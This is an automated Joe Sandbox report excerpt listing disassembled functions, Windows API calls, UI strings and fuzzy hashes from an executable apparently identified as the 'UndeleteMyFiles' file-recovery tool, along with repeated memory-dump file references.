Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Message
String ID: On %sselected to recover: %d (%d%%)recovered:%d (%d%%)recovered and removed:%d (%d%%)not recovered:%d (%d%$Cannot access the disk.$Cannot recover files because of the lack of memory.$Cannot recover files. The destination disk is full or read only.$How the selected files should be recovered?Choose YES if you want files to be recovered directly at the specified location.Choo$Total files selected to recover:%dTotal recovered:%d (%d%%)Total unrecovered:%d (%d%%)$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$d$h#I
API String ID: 2030045667-584004917
Opcode ID: 2ba79f3e62d0061d46be5da72a630b4f5675e3152d6d9ed79848a284049cadc5
Instruction ID: 334dcef49d6c4a59d19d1e98806e30033b5bf95cd4c09f88cdd8cc3094f5a830
Opcode Fuzzy Hash: 2ba79f3e62d0061d46be5da72a630b4f5675e3152d6d9ed79848a284049cadc5
Instruction Fuzzy Hash: 4F422674900628CBDB24CF55D954AAAB7B5BB88B04F10C5EAE98963350DB386FC1CF58

Function 0044F450 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 402windowtimeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0044F46A
SetWindowLongW.USER32(?,000000EB,?), ref: 0044F511
SendMessageW.USER32(?,00000403,00000005,00000000), ref: 0044F524
SendMessageW.USER32(?,00000401,0000000F,00000000), ref: 0044F537
SetWindowLongW.USER32(?,000000EB,00000000), ref: 0044F54A
GetClientRect.USER32(?,00000000), ref: 0044F578
BeginPaint.USER32(?,?), ref: 0044F586
GetWindowLongW.USER32(?,000000F0), ref: 0044F5BA
CopyRect.USER32(00000000,?), ref: 0044F605
SetRect.USER32(?,00000000,?,?,?), ref: 0044F661
SetTimer.USER32(?,00000000,?,00000000), ref: 0044F829
RedrawWindow.USER32(?,00000000,00000000,00000101), ref: 0044F878
DefWindowProcW.USER32(?,?,?,?), ref: 0044F8F3

Strings

Progress, xrefs: 0044F58C

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Long$Rect$MessageSend$BeginClientCopyPaintProcRedrawTimer
String ID: Progress
API String ID: 2569671748-3682045968
Opcode ID: ea1f974a307a9f65e7c577c09fc5ac04c44c5284e9e86383da1ce7a08e2516d9
Instruction ID: 5dcb35ec1b12174e1d3f5a70781c1a3ee3f7811309c063da8fcb2bb8af878bb9
Opcode Fuzzy Hash: ea1f974a307a9f65e7c577c09fc5ac04c44c5284e9e86383da1ce7a08e2516d9
Instruction Fuzzy Hash: 21F12A75A00208EFDB14CFE8CC85FDEBBB5BB48304F20852AE615AB295D774A985CF54

Function 00418340 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(Native), ref: 00418351
RegisterWindowMessageW.USER32(OwnerLink), ref: 0041835A
RegisterWindowMessageW.USER32(ObjectLink), ref: 00418364
RegisterWindowMessageW.USER32(Embedded Object), ref: 0041836E
RegisterWindowMessageW.USER32(Embed Source), ref: 00418378
RegisterWindowMessageW.USER32(Link Source), ref: 00418382
RegisterWindowMessageW.USER32(Object Descriptor), ref: 0041838C
RegisterWindowMessageW.USER32(Link Source Descriptor), ref: 00418396
RegisterWindowMessageW.USER32(FileName), ref: 004183A0
RegisterWindowMessageW.USER32(FileNameW), ref: 004183AA
RegisterWindowMessageW.USER32(Rich Text Format), ref: 004183B4
RegisterWindowMessageW.USER32(RichEdit Text and Objects), ref: 004183BE

Strings

Native, xrefs: 0041834A
OwnerLink, xrefs: 00418353
Link Source, xrefs: 0041837A
Rich Text Format, xrefs: 004183AC
FileName, xrefs: 00418398
Embed Source, xrefs: 00418370
FileNameW, xrefs: 004183A2
ObjectLink, xrefs: 0041835C
Object Descriptor, xrefs: 00418384
Embedded Object, xrefs: 00418366
RichEdit Text and Objects, xrefs: 004183B6
Link Source Descriptor, xrefs: 0041838E

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: cc732602ec2b6d9b980ca17b97c995e556f12aa9c4b0a40df4e9e3eef283290b
Instruction ID: 6f349488088c07c82fa610a6ed8f7ea850c7481d24eb881a4a1a938433422b9d
Opcode Fuzzy Hash: cc732602ec2b6d9b980ca17b97c995e556f12aa9c4b0a40df4e9e3eef283290b
Instruction Fuzzy Hash: 9701B4B1E417597BCB149F7B9C0E98A7EA4FE84BA03248927A00D87550EBBCD050CFC8

Function 00426F45 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 432memorystringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00426FA6
_memset.LIBCMT ref: 00426FCE
lstrlenA.KERNEL32(?,00000000,00000000,0042724E), ref: 00426FDE
_memset.LIBCMT ref: 00427045
_memset.LIBCMT ref: 00427210
VariantClear.OLEAUT32(?), ref: 00427267
VariantClear.OLEAUT32(?), ref: 0042728F
SysStringLen.OLEAUT32(?), ref: 004272E6
_DebugHeapAllocator.LIBCPMTD ref: 004272F2
SysFreeString.OLEAUT32(?), ref: 00427300
SysStringLen.OLEAUT32(?), ref: 00427305
_DebugHeapAllocator.LIBCPMTD ref: 00427311
SysFreeString.OLEAUT32(?), ref: 00427319
SysStringLen.OLEAUT32(?), ref: 0042731E
_DebugHeapAllocator.LIBCPMTD ref: 0042732A
SysFreeString.OLEAUT32(?), ref: 00427332
__CxxThrowException@8.LIBCMT ref: 0042734C
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042736A
VariantClear.OLEAUT32(?), ref: 0042737A

Strings

NrB, xrefs: 004270D9, 004270F8, 0042710B, 0042712A, 0042719D, 0042719E

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: String$Variant$AllocatorClearDebugFreeHeap_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID: NrB
API String ID: 1418167614-10371600
Opcode ID: a0a0bb315dca54cee9ca2c1901bac74d366a753f49f7708c03526fde1be52276
Instruction ID: 35b9245cc99fd79f9cfefdb0a8d18c181f06b7ea3f004dcb59d6b7bbb2a1a4c5
Opcode Fuzzy Hash: a0a0bb315dca54cee9ca2c1901bac74d366a753f49f7708c03526fde1be52276
Instruction Fuzzy Hash: 77F1BA70A04229DFCF11DFA9E884AAEBBB4FF45300F54405AF901AB291D7789D52CF69

Function 00426F9F Relevance: 37.1, APIs: 20, Strings: 1, Instructions: 377memorystringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00426FA6
_memset.LIBCMT ref: 00426FCE
lstrlenA.KERNEL32(?,00000000,00000000,0042724E), ref: 00426FDE
_memset.LIBCMT ref: 00427045
_memset.LIBCMT ref: 00427210
VariantClear.OLEAUT32(?), ref: 0042728F
SysStringLen.OLEAUT32(?), ref: 004272E6
_DebugHeapAllocator.LIBCPMTD ref: 004272F2
SysFreeString.OLEAUT32(?), ref: 00427300
SysStringLen.OLEAUT32(?), ref: 00427305
_DebugHeapAllocator.LIBCPMTD ref: 00427311

Strings

NrB, xrefs: 004270D9, 004270F8, 0042710B, 0042712A, 0042719D, 0042719E

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: String_memset$AllocatorDebugHeap$ClearFreeH_prolog3Variantlstrlen
String ID: NrB
API String ID: 1909623240-10371600
Opcode ID: 02cbff939331080605d0aad01b513113efbaa07c47193b379fde0163ec6558fd
Instruction ID: 6b93471a3eccce2c47affd220f7f93c0e277d651846d54b33d84fb4c81aa0d63
Opcode Fuzzy Hash: 02cbff939331080605d0aad01b513113efbaa07c47193b379fde0163ec6558fd
Instruction Fuzzy Hash: 80E18A70A0422ADFCF11DFA9E884AAEBBB4FF44300F54405AF901AB391D7789956CF65

Function 004483C0 Relevance: 35.3, APIs: 8, Strings: 12, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 00405B10: SendMessageW.USER32(?,00000469,00000000,00000000), ref: 00405B2E

Part of subcall function 00405B40: SendMessageW.USER32(?,0000046F,?,?), ref: 00405B5B

__aulldiv.LIBCMT ref: 00448590
__itow_s.LIBCMT ref: 004485FC
__itow_s.LIBCMT ref: 004486B2

Part of subcall function 004028D0: SendMessageW.USER32(?,000000F1,?,00000000), ref: 004028E9

__aulldiv.LIBCMT ref: 00448647

Part of subcall function 0041375B: IsWindow.USER32(?), ref: 0041376F

Part of subcall function 00405A60: SendMessageW.USER32(?,0000014E,?,00000000), ref: 00405A79

Part of subcall function 00405A90: SendMessageW.USER32(?,0000014A,?,?), ref: 00405AAB

Strings

does not equal, xrefs: 00448720
is greater than, xrefs: 004487C8
equals, xrefs: 0044879E
is greater than or equal to, xrefs: 0044874A
is greater than or equal to, xrefs: 004487DD
is less than, xrefs: 004487F2
does not equal, xrefs: 004487B3
is less than or equal to, xrefs: 00448807
equals, xrefs: 0044870B
is less than, xrefs: 0044875F
is greater than, xrefs: 00448735
is less than or equal to, xrefs: 00448774

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageSend$__aulldiv__itow_s$Window
String ID: does not equal$does not equal$equals$equals$is greater than$is greater than$is greater than or equal to$is greater than or equal to$is less than$is less than$is less than or equal to$is less than or equal to
API String ID: 2579152979-730745360
Opcode ID: a6ccb577682bd93edccbeeb970465e7ab53f9fec4c26c1f914ac3f54f2552f92
Instruction ID: e7a701b3ee89011f2f3cf441baf28d57df09f9701bf32158675ef88f5fde059a
Opcode Fuzzy Hash: a6ccb577682bd93edccbeeb970465e7ab53f9fec4c26c1f914ac3f54f2552f92
